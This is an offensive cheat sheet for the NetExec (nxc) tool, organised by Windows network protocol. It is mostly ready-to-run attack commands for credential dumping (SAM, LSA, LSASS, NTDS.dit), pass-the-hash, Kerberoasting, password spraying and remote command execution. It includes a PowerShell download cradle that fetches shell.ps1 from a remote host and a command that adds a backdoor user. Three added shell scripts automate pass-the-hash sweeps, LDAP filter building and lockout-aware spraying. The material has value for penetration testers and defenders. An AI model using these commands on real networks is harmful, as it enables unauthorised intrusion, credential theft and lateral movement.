NetExec (nxc)
NetExec is the actively maintained successor to CrackMapExec. It speaks SMB, LDAP, WinRM, MSSQL, SSH, RDP, FTP, and more: use it for credential validation, enumeration, lateral movement, and post-exploitation across an entire subnet in one command.
# Install / update
pipx install netexec
pipx upgrade netexec
# List all available modules for a protocol
nxc smb -L
nxc ldap -L
# Get options for a specific module
nxc smb -M lsassy --options
SMB
SMB is the primary protocol for Windows enumeration and lateral movement. Start unauthenticated to see what's exposed, then escalate to authenticated enumeration once you have credentials.
Host Discovery
Sweep a subnet to find live Windows hosts and identify domain membership, OS version, and SMB signing status.
nxc smb 192.168.1.0/24 # discover all SMB hosts on subnet
nxc smb 192.168.1.0/24 --gen-relay-list relay.txt # output hosts with signing disabled (relay targets)
nxc smb targets.txt # read targets from a file (one host or CIDR per line)
Null and Guest Sessions
Test for unauthenticated access before using credentials: null sessions often expose user lists and share names.
nxc smb <ip> -u '' -p '' # null session
nxc smb <ip> -u 'guest' -p '' # guest account (often enabled)
nxc smb <ip> -u '' -p '' --shares # enumerate shares via null session
nxc smb <ip> -u '' -p '' --users # list users via null session
nxc smb <ip> -u '' -p '' --pass-pol # dump password policy (check lockout threshold before spraying)
Credential Validation
A [+] in the output means the credential is valid; (Pwn3d!) after it means the account has local admin rights on that host.
nxc smb <ip> -u user -p 'Password123' # basic auth check
nxc smb <ip> -u user -p 'Password123' --local-auth # auth against local SAM (not domain)
nxc smb <ip> -u user -H <NThash> # pass-the-hash
nxc smb <ip> -u user -H <NThash> --local-auth # PTH against local account
nxc smb <ip> -u user --use-kcache # use active Kerberos ticket (KRB5CCNAME must be set)
nxc smb <ip> -u user -p pass -d domain.local # specify domain explicitly
nxc smb <ip> -u user -p pass -d domain.local -k --kdcHost dc01 # Kerberos auth (-k) with an explicit KDC
Share Enumeration
List all shares and their access level: look for non-default shares like backup, data, scripts, IT.
nxc smb <ip> -u user -p pass --shares # list shares + read/write access
nxc smb <ip> -u user -p pass --disks # list local disks on the target
Share Spidering
Recursively enumerate file metadata across all readable shares: spider_plus writes a JSON map of every readable file path (default output folder /tmp/nxc_spider_plus/) and downloads nothing unless told to. For a quick filename or content search on a single share, the built-in --spider is lighter.
nxc smb <ip> -u user -p pass -M spider_plus # spider all readable shares (metadata only)
nxc smb <ip> -u user -p pass -M spider_plus -o DOWNLOAD_FLAG=True # also download files (capped by MAX_FILE_SIZE)
nxc smb <ip> -u user -p pass -M spider_plus -o EXCLUDE_EXTS=exe,dll # skip binary files
nxc smb <ip> -u user -p pass -M spider_plus -o EXCLUDE_FILTER=print$,ipc$,backup # skip matching shares/folders
nxc smb <ip> -u user -p pass --spider Data --pattern password # built-in spider: match file names on one share
nxc smb <ip> -u user -p pass --spider Data --pattern password --content # search file contents instead of names
File Operations
Download or upload files directly over SMB without a separate tool.
nxc smb <ip> -u user -p pass --get-file '\Windows\Temp\file.txt' ./local_file.txt --share C$ # download (path is relative to --share, default C$)
nxc smb <ip> -u user -p pass --put-file ./local.txt '\Windows\Temp\remote.txt' --share C$ # upload
User and Group Enumeration
Pull users, groups, logged-on sessions, and local admins from the target.
nxc smb <ip> -u user -p pass --users # list domain users (via SAM/SAMR)
nxc smb <ip> -u user -p pass --groups # list domain groups
nxc smb <ip> -u user -p pass --local-groups # list local groups on target
nxc smb <ip> -u user -p pass --loggedon-users # show currently logged-on users
nxc smb <ip> -u user -p pass --sessions # show active SMB sessions
nxc smb <ip> -u user -p pass --pass-pol # dump domain password policy
RID Brute Force
Enumerate accounts by brute-forcing RIDs over SAMR: works even when --users is restricted, and finds local accounts too.
nxc smb <ip> -u user -p pass --rid-brute # brute RIDs 500-4000 (default)
nxc smb <ip> -u user -p pass --rid-brute 10000 # brute RIDs up to 10000
nxc smb <ip> -u '' -p '' --rid-brute # attempt via null session (older or misconfigured hosts)
Command Execution
Run commands on the remote host: -x uses cmd.exe, -X uses PowerShell. Requires admin rights.
nxc smb <ip> -u user -p pass -x 'whoami /all' # cmd.exe execution
nxc smb <ip> -u user -p pass -X 'Get-Process' # PowerShell execution
nxc smb <ip> -u user -p pass -x 'whoami' --exec-method wmiexec # WMI (tried first by default; no service created)
nxc smb <ip> -u user -p pass -x 'whoami' --exec-method mmcexec # DCOM via MMC20.Application (no service created)
nxc smb <ip> -u user -p pass -x 'whoami' --exec-method smbexec # temporary service per command; no binary uploaded
nxc smb <ip> -u user -p pass -x 'whoami' --exec-method atexec # scheduled task (needs the Task Scheduler service)
nxc smb <ip> -u user -p pass --no-output -x 'net user hacker Pass123! /add' # don't fetch output (no output file written on the target)
Credential Dumping
Dump credential stores from the target: all require local admin. --sam and --lsa read the registry hives through the remote registry service and never touch LSASS, so they work even with RunAsPPL enabled; lsassy reads LSASS memory, which is where logged-on users' credentials live but is also what EDR watches most closely. Pick the one that matches what you need, not one over the other.
# SAM database (local account hashes)
nxc smb <ip> -u user -p pass --sam
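Added example (not part of this page or of NetExec): a POSIX shell pipeline that pulls unique NT hashes out of saved --sam output and turns each into a --local-auth pass-the-hash sweep, which is the quickest way to find local admin password reuse across a subnet. The log lines are constructed to mimic nxc's `user:rid:lmhash:nthash:::` lines; the hash of the empty password (31d6cfe0d16ae931b73c59d7e0c089c0) is dropped because it only means the account has no password set.

```shell
#!/usr/bin/env sh
# Added example: harvest NT hashes from saved `nxc smb ... --sam` output and
# build --local-auth pass-the-hash sweeps from them. Not NetExec code.

# Constructed sample of --sam output for two hosts (not a real capture).
# A real run would be: nxc smb 10.0.0.0/24 -u admin -p pass --sam --log sam.log
SAMPLE_SAM='SMB  10.0.0.21  445  WS01  [+] Dumping SAM hashes
SMB  10.0.0.21  445  WS01  Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB  10.0.0.21  445  WS01  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB  10.0.0.21  445  WS01  localsvc:1001:aad3b435b51404eeaad3b435b51404ee:a4f49c406510bdcab6824ee7c30fd852:::
SMB  10.0.0.22  445  WS02  [+] Dumping SAM hashes
SMB  10.0.0.22  445  WS02  Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB  10.0.0.22  445  WS02  [+] Added 2 SAM hashes to the database'

# Read nxc output on stdin, print unique "user:nthash" pairs (one per line).
# The empty-password hash is skipped: it means "no password", not a reusable secret.
sam_hashes() {
    awk '{
        for (i = 1; i <= NF; i++) {
            n = split($i, f, ":")
            if (n >= 5 && length(f[3]) == 32 && length(f[4]) == 32 && f[4] ~ /^[0-9a-fA-F]+$/) {
                h = tolower(f[4])
                key = f[1] ":" h
                if (h != "31d6cfe0d16ae931b73c59d7e0c089c0" && !(key in seen)) {
                    seen[key] = 1
                    print key
                }
            }
        }
    }'
}

# Read "user:nthash" pairs on stdin, print one nxc PTH sweep per pair.
# --local-auth because SAM hashes belong to local accounts, not the domain.
pth_cmds() {
    subnet=$1
    while IFS=: read -r user hash; do
        [ -n "$hash" ] || continue
        printf 'nxc smb %s -u %s -H %s --local-auth\n' "$subnet" "$user" "$hash"
    done
}

# Demo on the constructed sample: prints the sweep commands, executes nothing.
printf '%s\n' "$SAMPLE_SAM" | sam_hashes | pth_cmds 10.0.0.0/24
```

Feed a real log with `sam_hashes < sam.log | pth_cmds 10.0.0.0/24 | sh` once you have reviewed the commands; every host that answers with (Pwn3d!) shares that local admin secret.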
# LSA secrets (service account creds, DPAPI keys, cached domain hashes)
nxc smb <ip> -u user -p pass --lsa
# LSASS via lsassy module (handles multiple dump methods automatically)
nxc smb <ip> -u user -p pass -M lsassy
nxc smb <ip> -u user -p pass -M lsassy -o METHOD=comsvcs # use comsvcs.dll
nxc smb <ip> -u user -p pass -M lsassy -o METHOD=procdump # use procdump.exe (upload required)
nxc smb <ip> -u user -p pass -M lsassy -o METHOD=nanodump # use nanodump (EDR evasion)
# DPAPI secrets (browser saved passwords, credential manager); a built-in flag, not a module
nxc smb <ip> -u user -p pass --dpapi # dump DPAPI secrets of the users on the host
nxc smb <ip> -u user -p pass --dpapi --mkfile masterkeys.txt # reuse masterkeys saved from a previous run
# NTDS.dit via ntdsutil (DC only: uses IFM to extract)
nxc smb <dc-ip> -u admin -p pass -M ntdsutil
# Backup Operator privilege abuse (dump SAM/SYSTEM/SECURITY via backup rights)
nxc smb <dc-ip> -u backup_user -p pass -M backup_operator # against a DC this yields the domain's hives
Host Information
Pull system info and generate a hosts file for internal network mapping.
nxc smb <ip> -u user -p pass --generate-hosts-file hosts.txt # write /etc/hosts-format file
nxc smb 192.168.1.0/24 -u user -p pass --generate-hosts-file internal_hosts.txt
Password Change
Change passwords via SMB: useful for self-service changes or when you have ForceChangePassword on another account.
# Change your own password (requires the current password)
nxc smb <ip> -u user -p 'OldPass' -M change-password -o NEWPASS='NewPass123!'
# Change own password using hash (PTH self-service)
nxc smb <ip> -u user -H <NThash> -M change-password -o NEWPASS='NewPass123!'
# Force change another user's password (requires ForceChangePassword ACE)
nxc smb <ip> -u attacker -p pass -M change-password -o USER=target NEWPASS='NewPass123!'
# Force change using hash
nxc smb <ip> -u attacker -H <NThash> -M change-password -o USER=target NEWPASS='NewPass123!'
Miscellaneous SMB Modules
Additional recon and abuse modules useful during post-exploitation.
nxc smb <ip> -u user -p pass -M wdigest -o ACTION=enable # enable WDigest (plaintext in LSASS)
nxc smb <ip> -u user -p pass -M wdigest -o ACTION=disable # disable WDigest
nxc smb <ip> -u user -p pass -M web_delivery -o URL=http://<ip>/shell.ps1 # trigger download cradle
nxc smb <ip> -u user -p pass -M empire_exec -o LISTENER=http AGENT=<agent> # Empire exec
nxc smb <ip> -u user -p pass -M coerce_plus # test coercion methods (printerbug, petitpotam, etc.)
nxc smb <ip> -u user -p pass -M runasppl # check RunAsPPL (LSASS protection)
nxc smb <ip> -u user -p pass -M uac # check UAC configuration
nxc smb <ip> -u user -p pass -M rdp -o ACTION=enable # enable RDP
nxc smb <ip> -u user -p pass -M rdp -o ACTION=disable # disable RDP
LDAP
LDAP is the primary channel for querying Active Directory. Use it for targeted attribute enumeration, BloodHound collection, and Kerberos-based attacks.
Credential Validation
Validate domain credentials against the DC via LDAP: lighter than SMB and works even when SMB is firewalled.
nxc ldap <dc-ip> -u user -p 'Password123' # basic LDAP auth check
nxc ldap <dc-ip> -u user -H <NThash> # PTH via LDAP
nxc ldap <dc-ip> -u user --use-kcache # use Kerberos ticket from KRB5CCNAME
User Enumeration
Pull user accounts and attributes directly from the directory.
nxc ldap <dc-ip> -u user -p pass --users # list all domain users
nxc ldap <dc-ip> -u user -p pass --users --no-sort # preserve LDAP order
nxc ldap <dc-ip> -u user -p pass --groups # list all domain groups
nxc ldap <dc-ip> -u user -p pass --computers # list all computer accounts
nxc ldap <dc-ip> -u user -p pass --admin-count # find accounts with adminCount=1 (sensitive accounts)
nxc ldap <dc-ip> -u user -p pass --password-not-required # find accounts with PASSWD_NOTREQD flag
nxc ldap <dc-ip> -u user -p pass --trusted-for-delegation # find unconstrained delegation accounts
nxc ldap <dc-ip> -u user -p pass -M subnets # list AD sites and subnets (for network mapping)
Description Field Mining
The get-desc-users module reads every user's Description field: admins commonly store passwords there as "notes".
nxc ldap <dc-ip> -u user -p pass -M get-desc-users # dump all account Description fields
nxc ldap <dc-ip> -u user -p pass -M get-desc-users -o KEYWORDS=pass,pwd,cred # filter by keyword
Custom LDAP Queries
Run arbitrary LDAP filters to extract any attribute from any object class.
# Full attribute dump for matching objects
nxc ldap <dc-ip> -u user -p pass --query "(sAMAccountType=805306368)" "*" # all user objects, all attrs
# Selected attributes only
nxc ldap <dc-ip> -u user -p pass --query "(sAMAccountType=805306368)" "sAMAccountName,description,memberOf"
# Accounts with SPN set (Kerberoastable)
nxc ldap <dc-ip> -u user -p pass --query "(&(sAMAccountType=805306368)(servicePrincipalName=*))" "sAMAccountName,servicePrincipalName"
# Accounts with pre-auth disabled (AS-REP roastable)
nxc ldap <dc-ip> -u user -p pass --query "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" "sAMAccountName"
# Accounts with PASSWD_NOTREQD
nxc ldap <dc-ip> -u user -p pass --query "(userAccountControl:1.2.840.113556.1.4.803:=32)" "sAMAccountName"
# Computers with unconstrained delegation (excluding DCs)
nxc ldap <dc-ip> -u user -p pass --query "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288)(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))" "name,dNSHostName"
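The numeric userAccountControl bits in the filters above are easy to mistype and hard to read back when --query prints the raw integer, so here is an added shell helper (not part of NetExec or of this page's original material) that builds those filters from flag names and decodes the integers nxc returns. The bit values are the documented userAccountControl flags; the sample query output is constructed, and the `attribute: value` line layout it assumes should be checked against your nxc version, since the decoder only needs the `userAccountControl:` label followed by the number.

```shell
#!/usr/bin/env sh
# Added example: build userAccountControl LDAP filters from flag names and
# decode the raw integer that `nxc ldap --query` prints. Not NetExec code.

# Documented userAccountControl bits (name:value).
UAC_BITS="SCRIPT:1 ACCOUNTDISABLE:2 HOMEDIR_REQUIRED:8 LOCKOUT:16 PASSWD_NOTREQD:32
PASSWD_CANT_CHANGE:64 ENCRYPTED_TEXT_PWD_ALLOWED:128 TEMP_DUPLICATE_ACCOUNT:256
NORMAL_ACCOUNT:512 INTERDOMAIN_TRUST_ACCOUNT:2048 WORKSTATION_TRUST_ACCOUNT:4096
SERVER_TRUST_ACCOUNT:8192 DONT_EXPIRE_PASSWORD:65536 MNS_LOGON_ACCOUNT:131072
SMARTCARD_REQUIRED:262144 TRUSTED_FOR_DELEGATION:524288 NOT_DELEGATED:1048576
USE_DES_KEY_ONLY:2097152 DONT_REQ_PREAUTH:4194304 PASSWORD_EXPIRED:8388608
TRUSTED_TO_AUTH_FOR_DELEGATION:16777216 PARTIAL_SECRETS_ACCOUNT:67108864"

# LDAP_MATCHING_RULE_BIT_AND, the OID used in every userAccountControl filter above.
LDAP_MATCH_BIT_AND="1.2.840.113556.1.4.803"

# uac_bit NAME -> prints the bit value; exit 1 if the name is unknown.
uac_bit() {
    for pair in $UAC_BITS; do
        if [ "${pair%%:*}" = "$1" ]; then echo "${pair##*:}"; return 0; fi
    done
    return 1
}

# uac_flags VALUE -> prints the names of all bits set in the integer VALUE.
uac_flags() {
    out=""
    for pair in $UAC_BITS; do
        if [ $(( $1 & ${pair##*:} )) -ne 0 ]; then out="$out ${pair%%:*}"; fi
    done
    echo "${out# }"
}

# uac_filter NAME [NAME...] -> LDAP filter requiring every named bit to be set.
uac_filter() {
    f=""
    for name in "$@"; do
        bit=$(uac_bit "$name") || { echo "unknown UAC flag: $name" >&2; return 1; }
        f="$f(userAccountControl:$LDAP_MATCH_BIT_AND:=$bit)"
    done
    if [ $# -gt 1 ]; then echo "(&$f)"; else echo "$f"; fi
}

# uac_query DC NAME [NAME...] -> complete nxc command for user objects with those bits.
uac_query() {
    dc=$1; shift
    printf 'nxc ldap %s -u user -p pass --query "(&(sAMAccountType=805306368)%s)" "sAMAccountName,userAccountControl"\n' \
        "$dc" "$(uac_filter "$@")"
}

# annotate_uac: copy query output from stdin, appending decoded flag names to
# every line that carries a numeric userAccountControl value.
annotate_uac() {
    while IFS= read -r line; do
        case "$line" in
            *userAccountControl:*)
                val=$(printf '%s' "${line##*userAccountControl:}" | tr -d ' \t\r')
                case "$val" in
                    ''|*[!0-9]*) printf '%s\n' "$line" ;;
                    *) printf '%s  # %s\n' "$line" "$(uac_flags "$val")" ;;
                esac ;;
            *) printf '%s\n' "$line" ;;
        esac
    done
}

# Demo: the AS-REP roasting query, then decoding a constructed response line
# (the attribute line layout is assumed, not copied from nxc output).
uac_query dc01.corp.local DONT_REQ_PREAUTH
printf 'LDAP  10.0.0.5  389  DC01  sAMAccountName:     svc_backup\nLDAP  10.0.0.5  389  DC01  userAccountControl: 4260352\n' | annotate_uac
```

Pipe real output through it with `nxc ldap <dc-ip> -u user -p pass --query "(sAMAccountType=805306368)" "sAMAccountName,userAccountControl" | annotate_uac`. The filter builder only expresses "bit set"; negations such as the `(!(...=8192))` clause that excludes DCs still have to be written by hand.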
# Find dMSA objects (Windows Server 2025 BadSuccessor)
nxc ldap <dc-ip> -u user -p pass --query "(objectClass=msDS-DelegatedManagedServiceAccount)" "name,msDS-ManagedAccountPrecededByLink"
Group Membership
Check which groups a specific user belongs to: useful for understanding what access a compromised account has.
nxc ldap <dc-ip> -u user -p pass -M groupmembership -o USER=target_user # list groups for user
nxc ldap <dc-ip> -u user -p pass -M group-mem -o GROUP="Domain Admins" # list members of a group (separate module)
BloodHound Collection
Collect all AD relationship data in BloodHound format: import the zip into BloodHound CE for graph analysis.
nxc ldap <dc-ip> -u user -p pass --bloodhound -c all # collect all BloodHound data
nxc ldap <dc-ip> -u user -p pass --bloodhound -c DCOnly # DC-only collection (faster, less noise)
nxc ldap <dc-ip> -u user -p pass --bloodhound -c Default,LoggedOn # combine collection methods (comma-separated)
nxc ldap <dc-ip> -u user -p pass --bloodhound -c all --dns-server <dc-ip> # resolve hostnames through the DC's DNS
Kerberoasting
Request TGS tickets for all SPN-registered accounts: output is in hashcat format ready for offline cracking.
nxc ldap <dc-ip> -u user -p pass --kerberoast hashes.txt # request all kerberoastable TGS hashes
nxc ldap <dc-ip> -u user -H <NThash> --kerberoast hashes.txt # PTH version
# Crack: hashcat -m 13100 hashes.txt rockyou.txt
AS-REP Roasting
Request AS-REP for accounts with pre-authentication disabled: works without credentials if you have a username list.
nxc ldap <dc-ip> -u user -p pass --asreproast hashes.txt # authenticated, auto-discovers targets
nxc ldap <dc-ip> -u '' -p '' --asreproast hashes.txt # null bind: only finds targets if the DC allows anonymous LDAP reads
nxc ldap <dc-ip> -u users.txt -p '' --asreproast hashes.txt # no credentials: request an AS-REP for each user in the list
# Crack: hashcat -m 18200 hashes.txt rockyou.txt
LAPS Passwords
Retrieve LAPS-managed local admin passwords: the ms-Mcs-AdmPwd (legacy LAPS) or msLAPS-Password (Windows LAPS) attribute is readable only by principals explicitly granted access, so the result shows which computers your account is trusted for. Note that --laps is an authentication option, not a dump: it fetches the target's LAPS password over LDAP with the supplied credentials and then logs in to the target as its managed local admin.
nxc ldap <dc-ip> -u user -p pass -M laps # dump all LAPS passwords you can read
nxc ldap <dc-ip> -u user -p pass -M laps -o COMPUTER=DC01 # LAPS password for a specific computer
nxc smb <ip> -u user -p pass --laps # authenticate to <ip> with its LAPS-managed local admin password
gMSA Passwords
Retrieve Group Managed Service Account passwords: msDS-ManagedPassword is returned only to principals listed in the account's msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword) and only over an encrypted LDAP connection, which nxc sets up for you.
nxc ldap <dc-ip> -u user -p pass --gmsa # retrieve all readable gMSA passwords (built-in flag, not -M)
LDAP Security Checks
Check whether the DC enforces LDAP signing and channel binding: if not enforced, LDAP relay attacks are possible.
nxc ldap <dc-ip> -u user -p pass -M ldap-checker # check signing + channel binding enforcement
nxc ldap <dc-ip> -u '' -p '' -M ldap-checker # null bind: only meaningful if the DC allows anonymous binds
Machine Account Quota
Check how many machine accounts unprivileged users can create: if above 0, RBCD and other attacks requiring a computer account become trivial.
nxc ldap <dc-ip> -u user -p pass -M maq # read ms-DS-MachineAccountQuota (default 10)
WinRM
WinRM (port 5985 HTTP, 5986 HTTPS) provides remote PowerShell access. Requires the account to be in the Remote Management Users group or a local admin.
Credential Validation
A [+] confirms a WinRM login. nxc tags every successful WinRM login as Pwn3d! because a login already means command execution; unlike SMB, it does not prove local admin, since a member of Remote Management Users gets the same result.
nxc winrm <ip> -u user -p pass # validate WinRM access
nxc winrm <ip> -u user -H <NThash> # PTH via WinRM
nxc winrm <ip> -u user --use-kcache # Kerberos ticket auth
nxc winrm <ip> -u user -p pass --ssl # HTTPS (port 5986)
Command Execution
-x runs a raw command, -X runs PowerShell: both return output inline.
nxc winrm <ip> -u user -p pass -x 'whoami /all' # cmd.exe command
nxc winrm <ip> -u user -p pass -X 'Get-Process | Select-Object Name,Id' # PowerShell command
nxc winrm <ip> -u user -p pass -X 'IEX(New-Object Net.WebClient).DownloadString("http://<ip>/shell.ps1")' # in-memory download cradle
MSSQL
MSSQL (default port 1433) is worth checking for weak auth and code execution via xp_cmdshell. Test Windows auth first, then SQL auth.
Authentication
Domain (Windows) authentication is the default; add --local-auth to log in with a SQL Server login such as sa. Test domain credentials first: service accounts and domain users often have SQL access through group membership without any SQL login existing.
nxc mssql <ip> -u user -p pass # Windows/domain auth (default)
nxc mssql <ip> -u user -H <NThash> # PTH with Windows auth
nxc mssql <ip> -u user -p pass --local-auth # SQL Server login (SQL auth)
nxc mssql <ip> -u sa -p '' --local-auth # blank sa password check
nxc mssql 192.168.1.0/24 -u sa -p sa --local-auth # spray subnet for weak sa creds
Query Execution
Run arbitrary T-SQL queries: useful for enumerating linked servers, database contents, and permissions.
nxc mssql <ip> -u user -p pass -q "SELECT @@version" # server version
nxc mssql <ip> -u user -p pass -q "SELECT name FROM master.dbo.sysdatabases" # list databases
nxc mssql <ip> -u user -p pass -q "SELECT name FROM master..syslogins" # list SQL logins
nxc mssql <ip> -u user -p pass -q "SELECT * FROM openquery([linked_srv], 'SELECT @@version')" # linked server query
nxc mssql <ip> -u user -p pass -q "EXEC sp_linkedservers" # enumerate linked servers
nxc mssql <ip> -u user -p pass -q "SELECT IS_SRVROLEMEMBER('sysadmin')" # 1 means the login is sysadmin
xp_cmdshell
Enable and abuse xp_cmdshell for OS command execution: requires sysadmin or equivalent rights.
nxc mssql <ip> -u user -p pass -x 'whoami' # auto-enables xp_cmdshell, runs cmd, disables after
nxc mssql <ip> -u user -p pass -x 'whoami' --no-output # suppress output (for blind execution)
# Manual xp_cmdshell enablement via query
nxc mssql <ip> -u user -p pass -q "EXEC sp_configure 'show advanced options',1; RECONFIGURE"
nxc mssql <ip> -u user -p pass -q "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE"
nxc mssql <ip> -u user -p pass -q "EXEC xp_cmdshell 'whoami'"
SSH
SSH is less common in Windows AD environments but frequently found in Linux targets reachable from a Windows pivot, and in some mixed-OS environments.
Authentication and Execution
Test credentials and run commands: supports password auth, key auth, and Kerberos where configured.
nxc ssh <ip> -u user -p pass # password auth
nxc ssh <ip> -u user --key-file ~/.ssh/id_rsa # private key auth
nxc ssh <ip> -u user -p pass -x 'id; hostname' # command execution
nxc ssh <ip> -u user -p pass -x 'sudo -l' # check sudo rights
nxc ssh 192.168.1.0/24 -u root -p 'password' -x 'id' # sweep subnet
Password Spraying
Spray one password across many accounts: always check --pass-pol first to get the lockout threshold. Default approach: one password per user per spray cycle, wait between cycles.
# Single password against a user list
nxc smb <ip> -u users.txt -p 'Password123' --continue-on-success # don't stop on first hit
# Single user against a password list (standard bruteforce)
nxc smb <ip> -u administrator -p passwords.txt --continue-on-success
# 1:1 user:pass list (no cross-product bruteforce)
nxc smb <ip> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
# Multiple passwords: pair carefully with lockout policy
nxc smb <ip> -u users.txt -p 'Winter2024!' --continue-on-success
nxc smb <ip> -u users.txt -p 'Spring2024!' --continue-on-success
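Added example (not part of this page or of NetExec) of the "check --pass-pol first, then pace the spray" advice as a POSIX shell helper: it parses the lockout threshold and reset window out of saved --pass-pol output, computes how many passwords fit in one window with a safety margin, and emits one nxc round per password with a sleep whenever the budget is used up. The pass-pol lines below are constructed; the label strings the parser keys on ("Account Lockout Threshold", "Reset Account Lockout Counter") should be checked against what your nxc version actually prints.

```shell
#!/usr/bin/env sh
# Added example: lockout-aware spraying schedule driven by `nxc smb --pass-pol`
# output. Not NetExec code. Parses the labels shown in the constructed sample.

# Constructed sample of `nxc smb <dc> -u '' -p '' --pass-pol` output.
SAMPLE_PASSPOL='SMB  10.0.0.5  445  DC01  [+] Dumping password info for domain: CORP
SMB  10.0.0.5  445  DC01  Minimum password length: 7
SMB  10.0.0.5  445  DC01  Password history length: 24
SMB  10.0.0.5  445  DC01  Reset Account Lockout Counter: 30 minutes
SMB  10.0.0.5  445  DC01  Locked Account Duration: 30 minutes
SMB  10.0.0.5  445  DC01  Account Lockout Threshold: 5'

# Read pass-pol output on stdin, print "<threshold> <reset_window_minutes>".
# A threshold of "None" (no lockout policy) is reported as 0.
parse_passpol() {
    awk '
        /Account Lockout Threshold:/ {
            s = $0; sub(/.*Threshold: */, "", s)
            t = (s ~ /^None/) ? 0 : s + 0
        }
        /Reset Account Lockout Counter:/ {
            s = $0; sub(/.*Counter: */, "", s); n = split(s, w, " ")
            for (i = 1; i < n; i += 2) {
                if (w[i+1] ~ /^day/) r += w[i] * 1440
                else if (w[i+1] ~ /^hour/) r += w[i] * 60
                else if (w[i+1] ~ /^minute/) r += w[i]
            }
        }
        END { print t + 0, r + 0 }
    '
}

# spray_budget THRESHOLD -> passwords that may be tried per reset window.
# Keeps a margin of two below the threshold (room for the user's own typos
# and for an attempt you forgot about); 0 means no lockout policy.
spray_budget() {
    if [ "$1" -eq 0 ]; then echo 0; return 0; fi
    b=$(( $1 - 2 ))
    if [ "$b" -lt 1 ]; then b=1; fi
    echo "$b"
}

# spray_cmd TARGET USERFILE PASSWORD DOMAIN -> one nxc spray round.
# Passwords containing a single quote would need extra escaping; not handled.
spray_cmd() {
    printf "nxc smb %s -u %s -p '%s' -d %s --continue-on-success\n" "$1" "$2" "$3" "$4"
}

# spray_schedule TARGET USERFILE DOMAIN THRESHOLD RESET_MIN  (passwords on stdin)
# Runs <budget> passwords, then waits out the reset window before the next batch.
# NXC_DRY_RUN=1 (default) only prints the plan; set NXC_DRY_RUN=0 to execute.
spray_schedule() {
    target=$1; userfile=$2; domain=$3; budget=$(spray_budget "$4"); reset_min=$5
    i=0
    while IFS= read -r pw; do
        [ -n "$pw" ] || continue
        if [ "$budget" -gt 0 ] && [ "$i" -gt 0 ] && [ $(( i % budget )) -eq 0 ]; then
            echo "# sleeping $(( reset_min + 1 )) minutes for the lockout counter to reset"
            if [ "${NXC_DRY_RUN:-1}" = 0 ]; then sleep $(( (reset_min + 1) * 60 )); fi
        fi
        cmd=$(spray_cmd "$target" "$userfile" "$pw" "$domain")
        echo "$cmd"
        if [ "${NXC_DRY_RUN:-1}" = 0 ]; then eval "$cmd"; fi
        i=$(( i + 1 ))
    done
}

# Demo on the constructed sample (dry run: nothing is executed).
set -- $(printf '%s\n' "$SAMPLE_PASSPOL" | parse_passpol)
echo "# lockout threshold $1, reset window $2 min -> $(spray_budget "$1") passwords per window"
printf 'Winter2024!\nSpring2024!\nSummer2024!\nAutumn2024!\n' | spray_schedule 10.0.0.5 users.txt corp.local "$1" "$2"
```

With a real policy: `nxc smb <dc-ip> -u '' -p '' --pass-pol | parse_passpol` gives the two numbers, and `NXC_DRY_RUN=0 spray_schedule <dc-ip> users.txt corp.local 5 30 < passwords.txt` runs the rounds. The reset window only tells you when the bad-password counter clears; accounts that were already locked by someone else stay locked, so watch nxc's STATUS_ACCOUNT_LOCKED_OUT messages and stop if they appear.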
# LDAP spray (doesn't touch SMB on the DC; still NTLM unless -k is given)
nxc ldap <dc-ip> -u users.txt -p 'Password123' --continue-on-success
# Kerberos spray (kerbrute-style): failures log event 4771 on the DC instead of 4625/4776; target by FQDN
nxc smb <host.domain.local> -u users.txt -p 'Password123' -k -d domain.local --kdcHost <dc> --continue-on-success
Global Flags Reference
These flags apply across all protocols and control auth method, threading, and output behavior.
# Authentication
-u <user> # username (file or single value)
-p <pass> # password (file or single value)
-H <hash> # NTLM hash (LM:NT or :NT format)
-d <domain> # domain name
--local-auth # authenticate against local accounts
-k, --kerberos # authenticate with Kerberos instead of NTLM
--use-kcache # use Kerberos ccache (requires KRB5CCNAME env var)
--kdcHost <host> # specify KDC hostname for Kerberos
--aesKey <key> # AES Kerberos key (pass-the-key)
# Targeting
-t <threads> # number of parallel threads (default: 256)
--timeout <seconds> # connection timeout per host (default: 5)
--port <port> # custom port
# Credential spraying
--continue-on-success # don't stop after first valid credential found
--no-bruteforce # pair users and passwords 1:1 (no cross-product)
# Output and logging
--verbose # show more detail including errors
--debug # full debug output
--log <file> # write output to file
-o <key=value> # pass options to module
# Modules
-M <module> # run a module
-L # list available modules for this protocol
--options # show options for the module selected with -M
Useful Module Reference
| Module | Protocol | What it does |
|---|---|---|
| spider_plus | SMB | Recursively maps all readable shares to JSON, optionally downloads files (DOWNLOAD_FLAG=True) |
| lsassy | SMB | Dumps LSASS memory remotely using multiple selectable methods |
| ntdsutil | SMB | Dumps NTDS.dit via the ntdsutil IFM method (DC only) |
| backup_operator | SMB | Abuses Backup Operator rights to extract the SAM/SYSTEM/SECURITY hives |
| change-password | SMB | Changes a user password via SMB (self or ForceChangePassword) |
| wdigest | SMB | Enables or disables WDigest plaintext caching in LSASS |
| coerce_plus | SMB | Tests authentication coercion primitives (PrinterBug, PetitPotam, DFSCoerce, etc.) |
| rdp | SMB | Enables or disables Remote Desktop on the target |
| runasppl | SMB | Checks whether RunAsPPL (LSASS Protected Process) is enabled |
| uac | SMB | Reads UAC configuration flags on the target |
| webdav | SMB | Checks if WebDAV (WebClient service) is running on the target |
| laps | LDAP | Reads LAPS-managed local admin passwords from the directory |
| get-desc-users | LDAP | Dumps the Description field of all user accounts (often contains passwords) |
| groupmembership | LDAP | Lists the groups a given user belongs to (USER=) |
| group-mem | LDAP | Lists the members of a given group (GROUP=) |
| ldap-checker | LDAP | Checks LDAP signing and channel binding enforcement on the DC |
| maq | LDAP | Reads ms-DS-MachineAccountQuota (affects RBCD attack feasibility) |
| subnets | LDAP | Lists AD sites and subnets |

